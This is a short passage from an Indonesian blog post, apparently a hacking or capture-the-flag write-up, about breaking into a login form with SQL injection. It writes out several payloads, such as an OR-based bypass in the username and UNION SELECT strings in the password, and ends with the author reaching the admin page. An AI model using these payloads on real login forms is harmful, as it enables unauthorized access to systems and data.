lalu saya coba menggunakan SQL UNION ternyata vuln, jadi saya coba teknik tersebut:
username: 1' OR '1
password: 1' OR '1' UNION SELECT 1,2--lalu login maka berhasil, selanjutnya melihat databasenya:
username: 1' OR '1
password: 1' OR '1' UNION SELECT database(),2--njir ternyata error, lalu saya coba ganti database() menjadi string, seperti ini:
username: 1' OR '1
password: 1' OR '1' UNION SELECT "dekguh",2--ternyata berhasil :D masuk ke admin.
No comments:
Post a Comment